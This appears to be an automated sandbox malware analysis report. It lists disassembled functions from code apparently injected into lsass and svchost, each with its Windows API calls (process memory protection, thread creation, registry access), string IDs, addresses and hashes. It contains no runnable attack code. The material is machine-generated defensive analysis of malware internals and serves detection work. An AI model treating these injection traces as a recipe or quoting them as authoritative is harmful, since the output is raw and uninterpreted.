                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: c24711f5e4ccf87d5e80ffb69706461687795d085dbc81286a19724898a2a8d5
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: D3015A72600B90C6E744DFA6E88C24EB7A4F788F80F064527EB9A4372ADF39C459C744
                                                                  Function 00000202C0AF2DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000202C0AF2D9B), ref: 00000202C0AF2ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000202C0AF2D9B), ref: 00000202C0AF2F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: 4ccc7f308ffffb04e28b660d9b7e4fbf79716dbb69ece1079529d9764aeabe7a
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: 4391AD63614750C9FB60DF6594CC3AD2BA0F744B88F26411BDF4A67A9ADB36C89AC700
                                                                  Function 00000202C0AE7D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: 77d80f9dbee3f851834fd7c7e2a90673b38f834d57733b8b2f108d4767e42c81
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: 0911EC26710B44C9FB00CB60E8993AD33A4F759B58F451E26DA6D467A5EB78C5988380
                                                                  Function 00000202C0ABA24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: 7d7f04bd19e7a731a6c7dafde95eda89c3a329cef3e26e8ce2b5ef349618afa7
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: B4616636604B84CAFB24DF65D48839D7BA0F358B88F054217EF4917B9ADB79D499C700
                                                                  Function 00000202C0AE23F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: 29b586d80d86d2dd6352c2401e50b34bd115b1afb984fbf05cbc000a4141d265
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 6451C5222047C1C1F6649A29A5EC3AE67A1F385780F560117DFE943B9BDE3DC96CCB40
                                                                  Function 00000202C0AC2DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: ee30d38affed31b38a1ae71746e81f1a3c84c15076c7b03193478497cef2870e
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: 0A614022A39F88CCF5639B3994AD269571CBF523C5F43D307EA0B75A63DB1B904B9600
                                                                  Function 00000202C0AF2B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: a5b9aff85e46cdca0c990605defdec232b6a9f9f2dfe78cb6c2825141ba38f4e
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: 65418073214B80C6EB208F65E48C3AE67A0F798794F524023EF8D87795DB79C44AC740
                                                                  Function 00000202C0AE98D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: c6835301eea6b141ab951bbdbd22de10031eba98f4cdd88e8fafccebf38e23db
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: FB112B32214B8482EB218F15E48835D77E5F788B94F594226EFDC0776ADF3DC5658B04
                                                                  Function 00000202C0AB7786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: 08d77e98046bf456f4cc7ff47bd697112ef962ad073d7842f594a56ce69dc36f
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 5AE08661641B44D0EF018F35E4C829C37A0DB59B54B4A91239A5C06312FA38D1EDC300
                                                                  Function 00000202C0AB77E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: c62a53234f056fb7875f4dd43f552bdaaea83cda8922a931c84352274bd2d7c4
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: 2CE08CA1A01B48C0EF028F35E4C829C3760EB68B58B8A91239A5C06312EA38D1E9C300
                                                                  Function 00000202C0AB78EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: 21612ab5ec52f5ab15ccd92b75c0beb28af2a9aee30857cc7ba07a4efd239e18
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 0DD06762211B84D5FE10EB14D8CD39D6334F394308FA25413924D41976DF6DCA9EC750
                                                                  Function 00000202C0AE1C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: 2908ed8c70ef6e53478651d64cf568e0e4b32d4df27596df8a614dfe14158e8e
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: 12116D22A01B90C1FA04CB67A48C21D67A5F7C9FD0F6A4126DF8D93736DF39D85A8304
                                                                  Function 00000202C0AE1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 57c18ebde478ef601b860432b04afcda540ff4a480a4db4bad1cccaa4c908e69
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: DFE03932601700C6F7048B62D84C349B7E5EB88B06F0681268A0907362DF7E889D8740
                                                                  Function 00000202C0AE1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: a6544d1a82574b1944e5995cc7c7424303f1f11fc498c1c946bd232dd240e5a6
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: 59E0E572611B40C6F7089B62D84C35DB7A5FB88B16F4A8126CA0907322EF3A889D8A14

                                                                  Executed Functions

                                                                  Function 000002A661303620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32 ref: 000002A661303639
                                                                  • PathFindFileNameW.SHLWAPI ref: 000002A661303648
                                                                    • Part of subcall function 000002A661303C74: StrCmpNIW.KERNELBASE(?,?,?,000002A66130254B), ref: 000002A661303C8C
                                                                    • Part of subcall function 000002A661303BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303BCE
                                                                    • Part of subcall function 000002A661303BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303BFC
                                                                    • Part of subcall function 000002A661303BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303C1E
                                                                    • Part of subcall function 000002A661303BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303C39
                                                                    • Part of subcall function 000002A661303BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303C5A
                                                                  • CreateThread.KERNELBASE ref: 000002A66130368F
                                                                    • Part of subcall function 000002A661301D40: GetCurrentThread.KERNEL32 ref: 000002A661301D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                  • String ID:
                                                                  • API String ID: 1683269324-0
                                                                  • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction ID: 6d527c4ffa2a22615c6c3880684768457c7209d08e3767d179ae56948d6c0f44
                                                                  • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction Fuzzy Hash: 43119270F20A048BFB60EB61AD4DB5A22DCB797F1AF4C41259507A3695DF7CC04C8A83
                                                                  Function 000002A661303C74 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 18 2a661303c74-2a661303c7f 19 2a661303c99-2a661303ca0 18->19 20 2a661303c81-2a661303c94 StrCmpNIW 18->20 20->19 21 2a661303c96 20->21 21->19
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: dialer
                                                                  • API String ID: 0-3528709123
                                                                  • Opcode ID: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                                  • Instruction ID: 01bc0c9df650b7303412c68f3f44326fa99728fe152795615fbb60613f06fa31
                                                                  • Opcode Fuzzy Hash: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                                  • Instruction Fuzzy Hash: 7DD0A7A0B116458BFF24DFE288CDA603398DB0AF05F8D4029C90253110DF2D898D8711
                                                                  Function 000002A6612D2AC0 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: 0824defc401c60810ac4f1cae9b4f1747633b09fd72c8282fbd3eb058abddc85
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: 6491FFB2F0125087EB648F25D10CB6DB399FB56F94F598124DE0A4B788DF38E89AC701
                                                                  Function 000002A661301AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 000002A661301628: GetProcessHeap.KERNEL32 ref: 000002A661301633
                                                                    • Part of subcall function 000002A661301628: HeapAlloc.KERNEL32 ref: 000002A661301642
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016B2
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DF
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613016F9
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301719
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301734
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301754
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130176F
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130178F
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017AA
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017CA
                                                                  • SleepEx.KERNELBASE ref: 000002A661301AE3
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017E5
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301805
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301820
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301840
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130185B
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130187B
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301896
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613018A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 948135145-0
                                                                  • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction ID: c5f4609d7a0ddf94ba0b255fe7b8c84c2027e9ba60fe4a7fa262d0ad67ab09e4
                                                                  • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction Fuzzy Hash: AD312871F10A0593FB50AB26D95C35A53FCAB86FCAF4C50219E0BA7795EF1CC45882D2

                                                                  Non-executed Functions

                                                                  Function 000002A6612D6D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
